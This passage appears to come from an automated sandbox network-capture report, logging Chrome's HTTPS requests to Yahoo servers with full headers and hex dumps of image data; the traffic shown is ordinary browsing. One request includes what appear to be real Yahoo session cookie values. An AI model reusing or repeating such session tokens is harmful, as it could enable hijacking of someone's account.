                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 25 54 3e ec db ee fa 3f 94 3f 6a 03 3e a8 1c b5 26 8c d9 33 3e 49 ce 88 a3 2d b5 0c 3a d8 bb 73 3c 0d c0 bf ef 19 d2 b9 04 e0 21 6c 02 60 a9 eb 7f 9d 6d eb d7 7e ae 9f b7 e5 25 e5 3e 0f 95 15 e5 12 c0 7b 7f 4a 56 3c 1d 4c a9 36 ee 8a 77 fa 91 ca 5c 5a f5 42 8a 10 29 e1 2f 27 83 18 aa 52 00 21 18 2c 51 59 bc 42 67 a1 5c 05 21 34 20 08 ea 00 c4 28 a9 15 7a c2 d8 6e 5c ec 93 9d 89 0c 50 23 e9 68 82 fd 30 9a 46 4f 8d 6c 20 00 10 dc 00 28 db a8 06 fb 86 92 30 00 46 aa a0 c6 a4 80 13 c2 44 db 23 43 9c 34 d0 f3 32 51 35 d1 f1 b0 04 ae d1 04 0f 56 54 f0 de 8b 4b b5 b5 50 9b 0d b5 b7 72 ef e4 01 f8 6b 92 e5 93 83 8d f6 2c 39 ac 94 c5 e0 03 3f ff 18 40 03 18 65 73 17 80 72 1f d3 aa 70 73 93 a1 8f 0a c6 0a b6 8b 2e 8a 04 f2 60 ae ac 5b 5b 5d d1 06 ab ab 54 3b 3f c0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: %T>??j>&3>I-:s<!l`m~%>{JV<L6w\ZB)/'R!,QYBg\!4 (zn\P#h0FOl (0FD#C42Q5VTKPrk,9?@esrps.`[[]T;?
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: c9 e8 09 0f bb fb e6 ec d1 af 38 e2 59 73 2b 14 23 78 32 19 de d1 df 61 45 f7 1c 69 5b 68 45 6d ec 14 56 4f f6 6e bb 5d fa 63 63 74 ea 79 88 8d 30 30 59 43 85 22 26 65 86 80 b4 45 cd f8 c9 4a 9f 89 00 16 06 ae 57 47 78 61 42 17 24 42 2b 88 c1 71 cc 58 33 c3 0a 51 f2 35 3d 55 fb 5a 12 8a 0d e7 87 09 a8 c2 11 60 b5 9a 7b b6 6c 4a 80 81 fa 1b 2a 5d aa e5 bd 15 a4 6e 96 56 81 f6 87 77 b9 31 bd ac 68 99 c5 bd a2 ff ca 4f 27 37 6d d6 05 b2 72 92 4c 6e 89 a3 46 59 36 ba b4 ec b0 de d3 37 47 de 38 60 b2 85 c1 ac 54 a5 03 7f 75 13 53 9a 53 0a 4a a0 6f c1 dc 5c 00 8e 4d 81 70 04 ef 32 79 ff aa 12 95 e0 c0 b8 d4 e7 c8 0f e7 64 32 58 0e f0 d6 89 f4 a6 43 40 be cc 8a c5 42 53 7f 4e a9 80 64 78 79 4b 70 19 cd e3 2a 32 1d f6 84 76 1d 1c 75 90 62 f2 5a 6f ea fa 0e a8 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 8Ys+#x2aEi[hEmVOn]ccty00YC"&eEJWGxaB$B+qX3Q5=UZ`{lJ*]nVw1hO'7mrLnFY67G8`TuSSJo\Mp2yd2XC@BSNdxyKp*2vubZog
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: ca df 92 ea 20 67 4f 3b fa 20 14 c0 51 b4 2a db 39 ce e2 f5 1c f4 c1 ed b5 ad 49 17 4f a4 5d ad 22 f3 58 5b be 6a 98 db 8e b2 3b e3 7c c6 a2 8f 3f 88 5c 91 93 a2 30 39 87 67 ba b0 4b 8c 72 3e ca 16 60 5c 60 c7 19 69 44 38 d1 47 d0 84 b3 6c 74 ad 19 ba f1 eb 37 7d 0f 22 5b 3b 5b 09 d9 20 b6 9b 51 ce ac bb 48 10 d4 a6 ee f1 41 b1 4e 54 8e f9 3d f1 c1 f3 89 c1 2b de b0 38 8c 79 a3 4b dc 43 41 22 a1 57 c4 df 05 f8 71 f8 1c 9e 77 f6 93 09 fd ed 62 00 e9 20 2a bf 6d a8 ff 80 eb 14 d6 f7 39 f1 e8 4a 87 d2 25 56 dd 28 83 21 fb 78 77 ec 09 cf f0 f7 bc 22 a1 40 46 19 a0 0c 31 62 c6 26 41 3c c9 90 83 7c c8 94 d9 1a bb 87 cd 0d bb 3f 1f 30 e0 2c ff a9 e7 ab 5d af e4 7c 70 99 6e 9d ee 90 53 db 28 41 ec 53 84 f6 11 0e 22 d5 f4 4f 56 3e 5f e4 a1 63 1f 35 4c 7a 6d c9 96
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: gO; Q*9IO]"X[j;|?\09gKr>`\`iD8Glt7}"[;[ QHANT=+8yKCA"Wqwb *m9J%V(!xw"@F1b&A<|?0,]|pnS(AS"OV>_c5Lzm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 43 2b 1a 4a 9b fe fc 2c c0 6e 66 94 aa 1d 47 46 96 c9 53 c5 35 9a 0e ff a5 a8 0e 94 5f 3f 7a 8a 4d e4 6d 31 38 c5 c6 94 b2 18 47 63 05 9a b3 b8 bf 14 ac 04 d5 a5 2a 91 46 21 35 08 26 9e c9 ef 91 30 07 80 3f 87 40 4e 4f de 3b b4 55 98 e3 27 be f3 b7 fb 0e ce 6c fc 4f ed a9 46 a3 b2 e1 7e 87 8b 9a 51 97 9e 19 7b 6c 66 94 0f cb 28 0d c4 88 4a a8 be 68 f5 f5 fa b0 35 98 f0 c7 ef 0b 9a 6a 88 6b a9 0a e8 91 fc 78 c6 fa 45 02 cd 17 15 10 34 5c f4 0b 15 0d ff 75 d4 d7 7a 92 c7 26 2d c0 0b db 87 8d 51 c7 c3 73 17 db 07 53 86 be 30 09 cf b7 41 8b 5c 52 84 07 14 17 27 82 dc 76 45 eb 44 2a 8d 1d d9 95 1b 14 94 7c b9 5b 7d 24 71 03 06 fe b6 bc c8 11 f8 cf 42 4d 03 75 d6 c3 93 e5 b9 90 5c 00 9c a3 12 78 c9 42 40 df 9a a0 62 7f c3 f8 bd 5b 82 5c 4f 6b 13 d7 b7 e9 ff f9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: C+J,nfGFS5_?zMm18Gc*F!5&0?@NO;U'lOF~Q{lf(Jh5jkxE4\uz&-QsS0A\R'vED*|[}$qBMu\xB@b[\Ok
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 4d e1 97 37 bc 5c 1c f2 9c 14 70 0a 0a 54 f8 82 23 d0 f4 20 df 7e dc fe 76 b4 c2 c9 a4 fe 52 bc 94 98 19 41 c7 3e 24 91 b9 a7 2e 13 ac 66 99 84 ce ba 3d 7c 5d f0 17 b5 2f cf 9c 5a 44 3f 96 ec 61 1d d4 b6 05 f1 77 44 4c 58 a2 f8 7e 14 ef f6 fe e9 be d4 0e 7c 99 1e 75 89 18 78 ea 75 a6 93 42 23 6f 1d b3 e2 e9 b3 eb e3 b8 b7 3c b2 90 5d c5 46 f4 3e 8d 0d 83 5b d1 df f1 e3 f3 a0 8d 72 08 bf 19 49 6e 24 db b6 c4 da d2 72 1e b2 36 1c a3 39 78 ab 30 97 5c 75 1d 6c cc 71 81 a6 45 90 05 16 59 ba be c3 37 de 11 0c 83 1e ed 8a d5 cc 80 95 11 d5 98 7f 7b a2 07 68 b7 79 bf b6 92 78 4d 9b 22 43 09 00 f9 13 87 c4 f1 9f a8 98 4c 9c da f9 a8 56 8e df da 73 de bb 56 4f 58 0b d2 4a f5 12 71 65 b3 34 73 e9 8c 71 5a 88 f6 fd 45 60 be 5f 5d 0f 0c 2b 95 f0 ab 81 d3 7e 6c 79 04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: M7\pT# ~vRA>$.f=|]/ZD?awDLX~|uxuB#o<]F>[rIn$r69x0\ulqEY7{hyxM"CLVsVOXJqe4sqZE`_]+~ly
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: b0 b4 d2 20 b4 ab be 3d 0c cc 95 97 e7 ef aa 2b 31 87 94 fd c6 a2 ad 6a 63 5f 30 2c e8 6f 22 35 ef bc e7 e4 8c 66 c6 e0 33 29 65 ec 46 c6 8c f8 15 1a 3d 39 45 c9 59 de d9 51 03 61 66 be ed 96 2c 6f 60 80 ec 05 eb 32 eb 7f 7d 5e 30 46 19 86 af 5e 61 de ca 70 c5 6f 7a 26 36 b9 0a c9 26 c4 fa 51 14 13 20 9c f5 be 34 dd b6 92 af 32 6e 12 75 9f 33 30 66 b3 b3 c4 4b ed 03 68 f0 ca 6b 2f a9 26 6d 60 38 5b dd d6 2d f2 aa ab 3d 83 e2 d5 74 8c ea 3e e7 31 75 af 4a db 5a 6e 56 70 8e 74 1c 24 9a f3 a9 98 4d c8 fc 53 c7 59 9d c3 4a 97 ea 16 31 9d b9 55 d3 c1 a4 3c 07 4a b9 79 be d0 26 f7 e6 13 8d 34 40 ff ce e0 5a 21 02 dd 9f 55 b9 60 9e 4f 39 27 62 91 99 6d 28 b6 07 92 cb dd 5a 39 bb 8d 33 d9 a7 f5 55 a3 ab 43 08 9c b5 b2 08 3b 78 5c 38 b3 31 5a dc b3 56 ec b1 01 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: =+1jc_0,o"5f3)eF=9EYQaf,o`2}^0F^apoz&6&Q 42nu30fKhk/&m`8[-=t>1uJZnVpt$MSYJ1U<Jy&4@Z!U`O9'bm(Z93UC;x\81ZV0


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    40192.168.2.44980387.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1033OUTGET /info/p.gif?apptype=default&beaconType=pageRenderStart&code=pageRender&bucket=900%2Cseamless&device=desktop&intl=us&rid=1pa4ckpjflnfm&site=fp&t=1727716855082 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC589INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-security-policy-report-only: default-src 'self'; report-uri https://csp.yahoo.com/beacon/csp?src=fendr_beaconeater.media.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:20:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    41192.168.2.44980087.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC763OUTGET /uu/api/res/1.2/RonKuGAd5Xs1CsylZkR9Og--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/88364cc0-7f3c-11ef-9e6d-608bb5010780.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1086INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 4280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="88364cc0-7f3c-11ef-9e6d-608bb5010780.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "bea398ad5c9a37547328cc541cf00687"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 14:59:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Request-Id: 8b4a4d1217cc1f8d9ac00ae8c571ed86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 15:12:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=2;cpu=0;start=2024-09-30T15:12:45.347Z;desc=hit,rtt;dur=93,content-info;desc="width=356,height=180,bytes=4280,owidth=3000,oheight=1688,obytes=224387,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 7691
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cld_id: 8b4a4d1217cc1f8d9ac00ae8c571ed86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 52 49 46 46 b0 10 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 20 00 00 00 63 01 00 b3 00 00 49 43 43 50 30 02 00 00 00 00 02 30 41 44 42 45 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 cf 00 06 00 03 00 00 00 00 00 00 61 63 73 70 41 50 50 4c 00 00 00 00 6e 6f 6e 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 41 44 42 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 63 70 72 74 00 00 00 fc 00 00 00 32 64 65 73 63 00 00 01 30 00 00 00 6b 77 74 70 74 00 00 01 9c 00 00 00 14 62 6b 70 74 00 00 01 b0 00 00 00 14 72 54 52 43 00 00 01 c4 00 00 00 0e 67 54 52 43 00 00 01 d4 00 00 00 0e 62 54 52 43 00 00 01 e4 00 00 00 0e 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: RIFFWEBPVP8X cICCP00ADBEmntrRGB XYZ acspAPPLnone-ADBEcprt2desc0kwtptbkptrTRCgTRCbTRCr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 29 39 35 71 13 a8 6e 8d 3f 06 28 a6 8b 25 8b 21 75 45 6c d9 11 89 01 58 11 cd 0e 01 89 74 a5 26 97 a0 83 46 ac 7b 66 a1 8d 43 c7 83 cc 0b f7 fa 93 40 06 10 2f 6d e6 5a 6d 33 8c b3 dc a6 95 25 49 b4 7a a1 19 1f 69 24 91 10 73 3d 5a 8a 74 36 8a 89 3d 95 02 2a 75 e2 47 9a 39 80 20 40 95 08 a7 08 ce ed ac f8 3b 15 78 20 7e 01 05 6b ca 9b 8a 5c ed 19 cd 0e 42 f7 73 bf 9a 1c 82 c7 c9 30 3a 00 00 fe e9 dd 7c e6 ee af 60 a4 ae d2 5c 72 1d ed 0f 73 3f d9 f2 ee 8a 1c 25 57 06 1f 46 f0 8f d2 7f 52 ac 9a 3b 51 2e b0 08 90 e4 ae e1 7a 72 ea 34 66 46 c6 4d 4a 9b b8 cf 58 20 4d 7c bc ab 5e 29 d7 30 8e 38 28 70 97 eb c5 d3 c5 f4 56 32 57 b5 36 5f 28 e4 81 80 1c 7a 67 37 60 00 b6 b0 e8 fd 82 e8 10 77 e1 f6 fa d2 d6 98 b4 d3 39 0d 2a 84 52 46 98 56 0a 3e 0a 2e 5e 41 6a b7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: )95qn?(%!uElXt&F{fC@/mZm3%Izi$s=Zt6=*uG9 @;x ~k\Bs0:|`\rs?%WFR;Q.zr4fFMJX M|^)08(pV2W6_(zg7`w9*RFV>.^Aj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1300INData Raw: 1b 34 8e f2 1f 4c ed ee ec 4e 9d 5e ab 5f c8 65 f2 af 50 63 37 79 28 da cc f7 da 72 94 41 ab dc ad 61 08 7c f3 0d 69 ff 88 4c 07 83 27 a1 b2 e5 e2 86 c1 df bf 30 e3 a7 1b b3 d4 23 39 22 0f 1f 77 07 f9 91 10 9e 6b 9c 95 44 63 59 ca 77 02 05 f2 6b 2b b0 65 6d 42 ef 4d 01 03 3c 4a 94 9d ca 92 bc c1 89 03 62 97 e0 93 72 fc 75 a2 0d 11 2d d0 c2 83 55 87 ed a8 0f c6 60 66 4b 59 87 8e 09 11 cf 2f 53 3b 0f db 12 f1 29 19 ec 24 0b 44 75 61 f5 9d a9 63 69 3b a1 e1 69 2b f6 4b 0c 2a e6 6a f3 ec 05 b8 b6 f1 ab 4d 16 16 2f 23 1f 08 a0 67 14 60 14 32 b5 de 1c ff 12 2d 4e 92 02 c2 63 d4 7a fa fd 80 14 20 da 80 38 22 71 28 aa ec f9 80 02 d3 07 38 82 df 8f a0 ad 1b 0f 1c 6a 4e 78 4b 14 f5 2b 7a 4a 94 d0 b2 5f b0 d4 9f dd f0 28 a9 01 54 fb dc 11 70 42 af 01 03 85 19 fd a6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 4LN^_ePc7y(rAa|iL'0#9"wkDcYwk+emBM<Jbru-U`fKY/S;)$Duaci;i+K*jM/#g`2-Ncz 8"q(8jNxK+zJ_(TpB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC380INData Raw: 2f 94 c6 9e ea de 57 30 45 be a4 e2 3b 42 ab 53 d1 f0 71 f3 7c 70 25 aa 1e 8e c2 ce 9d 1b 23 e5 12 cc c3 9d 8a d6 a3 e2 70 62 a2 1e 46 42 31 cc cf d1 6e d3 0a bf 4d f4 d1 77 64 83 5d b8 22 fc 05 63 a6 cb 86 10 6e a8 ad ef a1 fe d0 cf d8 64 4f 73 81 e0 52 5b 0a 54 48 b0 93 27 cb 05 60 32 63 2e ad 20 8c dc fe 61 a8 a2 ad ea 11 0f 5e f5 d5 24 61 b4 c7 bf 3f 31 5b fd 92 c1 a0 fd 97 11 91 10 aa bf df 75 a0 8b 88 0f 2c d7 73 c9 b2 56 6a e7 33 ac 2e 9a 81 a8 91 9f e1 b4 3e 43 1f b8 13 b3 2b 43 9c bf 59 52 83 5c a1 4b 80 96 ce 5a b7 0b d2 c5 18 c6 1c cd 26 4d ec d2 40 8c 32 45 81 5b 3d b4 dc fd 83 e7 fa 19 08 a4 0c f8 20 10 ac cb 78 25 ea cc 47 4d eb 62 67 59 5a 6a 01 5f b7 d8 ff fe 04 8e 74 f9 de 48 f6 4e a3 8c e1 63 f6 12 cc 17 72 3b 8c 71 43 ca 7d d6 ea 07 48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: /W0E;BSq|p%#pbFB1nMwd]"cndOsR[TH'`2c. a^$a?1[u,sVj3.>C+CYR\KZ&M@2E[= x%GMbgYZj_tHNcr;qC}H


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    42192.168.2.44979987.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC755OUTGET /uu/api/res/1.2/d2s6nYW_YMTX2VM1IGOKBQ--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/the_hill_articles_341/05f082c3610c0f639765aa4d2e67e189.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:56 UTC1027INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 9346
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="05f082c3610c0f639765aa4d2e67e189.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "f9039c095c9851d2a5bafe97c450bc48"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expiration: expiry-date="Fri, 22 Nov 2024 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 25 May 2024 14:55:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 17 Sep 2024 17:01:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
